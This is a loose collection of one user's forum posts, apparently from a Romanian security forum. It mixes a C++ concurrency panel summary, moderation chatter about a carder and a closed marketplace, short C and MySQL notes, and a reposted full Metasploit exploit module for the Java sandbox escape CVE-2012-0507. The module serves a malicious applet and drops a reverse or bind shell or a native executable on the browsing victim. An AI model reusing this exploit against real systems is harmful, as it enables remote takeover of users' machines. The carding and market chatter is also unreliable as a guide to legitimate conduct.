Nytro

[h=1]C&B 2011 Panel: Herb Sutter, Andrei Alexandrescu and Scott Meyers - Concurrency and Parallelism[/h] Posted: Nov 15, 2011 at 6:00 AM By: Charles I was able to attend C++ and Beyond 2011 and it was a tremendous experience. The technical depth and C++ goodness was profound and lasted for 3 whole days (and two evenings). Thanks Andrei Alexandrescu, Scott Meyers and Herb Sutter for allowing me to crash your affair with my camera - which was perhaps too big and too advanced for the likes of me - still, I was abe to capture some great content like this interactive panel on Concurrency and Parallelism with Scott, Andrei and Herb. Great questions from attendees. Note that this is the second in a series of three panels from C++ and Beyond 2011 that will appear on C9 over the coming months. Make sure to check out all the C&B 2011 content we're lucky enough to have stored on C9 Enjoy! Learn! Table of contents (click on the time code link to move the player to that point in time...): [00:00] Using multiple cores for useful work... [01:56] Does C++AMP build on PPL? [02:48] What about operating system scheduling for GPU operations? [03:49] Transition from platform-specific memory models to a standard(ized) C++ memory model (C++11's MM, to be specific...). [06:41] Is there a performance penalty associated with a standard C++ memory model? [09:18] What about functional languages/techniques (with respect to parallel and concurrent programming)? [15:44] Which performance pitfalls we may pitfall into? [16:13] What about the work on ranges and wouldn't they help parallelism? [20:34] Fortran arrays have things like slices and strides. What about C++AMP? [22:42] Parallel debugging... [23:30] How baked is C++AMP? [25:26] On SIMD and MIMD... [34:20] Computation-following-data versus data-following-computation... Download: http://ch9files.blob.core.windows.net/ch9/28f6/fc9b793f-cd7d-4280-b4cb-9f42016f28f6/CppBeyond11ConcurrencyPanel_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/28f6/fc9b793f-cd7d-4280-b4cb-9f42016f28f6/CppBeyond11ConcurrencyPanel_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/CB-2011-Panel-Herb-Sutter-Andrei-Alexandrescu-and-Scott-Meyers-Concurrency-and-Parallelism

Spune exact ce/cum/unde sa fie.

Exista carti, exista tutoriale, exista videoclipuri, se preda in licee/facultati, exista academii speciale pentru asa ceva, trebuie doar sa iti dai putin interesul.

Incepatori... Sa incepem cu o intrebare: ce ai citit legat de programare?

OMFG, asta e 0day, acum a aflat toata lumea...

Pula mea, nu erau indexate, dar external.php ala scotea ultimele posturi din tabelul "post"... INNER JOIN " . TABLE_PREFIX . "forum AS forum ON(forum.forumid = thread.forumid) Am pus eu: INNER JOIN " . TABLE_PREFIX . "forum AS forum ON(forum.forumid = thread.forumid AND forum.forumid <> 10 AND forum.forumid <> 11) Daca e vreo problema, spuneti.

gfhgfhfgh

Bum: http://i44.tinypic.com/j65pqx.png Si probabil e multe altele.

Nu am mai vazut de ani creatii proprii ale utilizatorilor... Deci o sectiune ar fi inutila. Posteaza, vedem dupa ce si cum.

User-ul "100" de aici e carder, mi-a zis direct. Zicea ca are forum de CC si mi-a propus sa isi faca reclama, daca are voie. Eu nu m-am stresat, dar ideea era ca astfel, discutiile despre carduri si alte cacaturi se vor putea posta pe forumul lui, iar noi am mai scapa de ei si ne-ar lasa in voia noastra. Voi ce ziceti? Luni fac la mine la facultate o prezentare despre securitatea aplicatiilor web (cacaturi de baza) iar dupa, o sa imi fac ceva timp de RST, si vedem exact ce facem. Apoi, ramanem cu RST market doar pentru cei cu 50+ posturi?

In sfarsit... Bine ai venit.

Legat de posturile de la RST Market, cand vad ceva aiurea, dau Delete, dar cand sunt multe nu sunt atent si e posibil sa mai fi acceptat eu vreo 2-3 naspa, dar le citesc de la cap la coada de obicei. In fine, eu cred ca ar fi bine sa inchidem un timp RST Market, e posibil sa fie lume cautata din cauza rahaturilor de pe acolo... //fraza editata (nu are legatura cu subiectul in cauza)// Nu o sa am timp nici in viitorul apropiat, sper sa imi fac pe viitor, sa mai fac cate ceva... Sa imi ziceti si mie daca vreti sa schimbati ceva.

"Thank you for sending this to Yahoo!. It has been passed along to the correct teams to investigate. Should there be question, we will contact you here. If a fix is required, we will again contact you and ask that you see the issue as resolved." Cateva ore mai tarziu: "A fix has been put in place and we ask that you see this issue as resolved." Mi-a facut placere, expl0iter. Faceti ce vreti cu XSS-urile de Yahoo, dar nu pe RST.

Am comandat eu, dar nu eram in tara. Era o "promotie", transport gratuit la multe produse, free doar 30 de zile, apoi dezactivat pentru ca iti lua de pe card 80 de dolari (pe un an). Nu stiu cum e pentru Romania.

Ban permanent. Si am trimis mail la Yahoo. Daca nu ii convine cuiva, _|_.

In sfarsit cineva pasionat de programare, bun venit.

Hai sa mergem diseara pe la el.

Pai ba, zicea co4ie ca venim la tine sa bem sambata, de-aia am crezut.

Pentru ca pe Windows nu o sa mearga, e if(c != '\r') Iar '\r' == 13 si '\n' == 10, e acelasi lucru.

Ok ar fi cam asa: #include <stdio.h> void f(unsigned char c) { if(c != 0xD) { f(getch()); printf("%c", c); } } int main() { f(getch()); return 0; } Pe Windows putea sa fie 10, dar am incercat inainte, si e 13.

Nu, intrebarea e gandita, fara vectori, pointeri sau clase (e "C" nu "C++"). Raspunsurile pe PM.

[h=1]Java AtomicReferenceArray Type Violation Vulnerability[/h] ### This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize( info = {} ) super( update_info( info, 'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability', 'Description' => %q{ This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r', # metasploit module 'juan vazquez', # metasploit module 'egypt' # special assistance ], 'References' => [ ['CVE', '2012-0507'], ['BID', '52161'], ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'], ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'] ], 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 14 2012' )) end def exploit # load the static jar file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" ) fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close super end def on_request_uri( cli, request ) data = "" host = "" port = "" peer = "#{cli.peerhost}:#{cli.peerport}" if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + '/', '') return end print_status("#{peer} - Sending #{self.name}") payload = regenerate_payload( cli ) if not payload print_error("#{peer} - Failed to generate the payload." ) return end if target.name == 'Generic (Java Payload)' if datastore['LHOST'] jar = payload.encoded host = datastore['LHOST'] port = datastore['LPORT'] vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" ) else port = datastore['LPORT'] datastore['RHOST'] = cli.peerhost vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." ) end if jar print_status( "Generated jar to drop (#{jar.length} bytes)." ) jar = Rex::Text.to_hex( jar, prefix="" ) else print_error("#{peer} - Failed to generate the executable." ) return end else # NOTE: The EXE mixin automagically handles detection of arch/platform data = generate_payload_exe if data print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) else print_error("#{peer} - Failed to generate the executable." ) return end end send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) return end print_status( "#{peer} - sending jar..." ) send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html( data, jar, host, port ) jar_name = rand_text_alpha(rand(6)+3) + ".jar" html = "<html><head></head>" html += "<body>" html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">" html += "<param name=\"data\" value=\"#{data}\"/>" if data html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar html += "<param name=\"lhost\" value=\"#{host}\"/>" if host html += "<param name=\"lport\" value=\"#{port}\"/>" if port html += "</applet></body></html>" return html end def generate_jar() return @jar_data end end Sursa: Java AtomicReferenceArray Type Violation Vulnerability

Exista programe care pe baza unor semnaturi iti arata ce posibilitati ar putea fi. Java? Asta e altceva, are cumva extensia .jar sau .class? Daca e .exe sau .dll, vezi: PEiD Vezi si PE Explorer si multe alte programe utile...

Ia ban, rapid si usor.

Chestia aia e valabila numai daca te conectezi folosind JDBC la MySQL, iti permite sa folosesti multiple queries, dar MySQL nu te opreste sa executi mai multe query-uri, e pentru driver-ul JDBC nu pentru MySQL. A se vedea si: http://se2.php.net/manual/en/mysqli.multi-query.php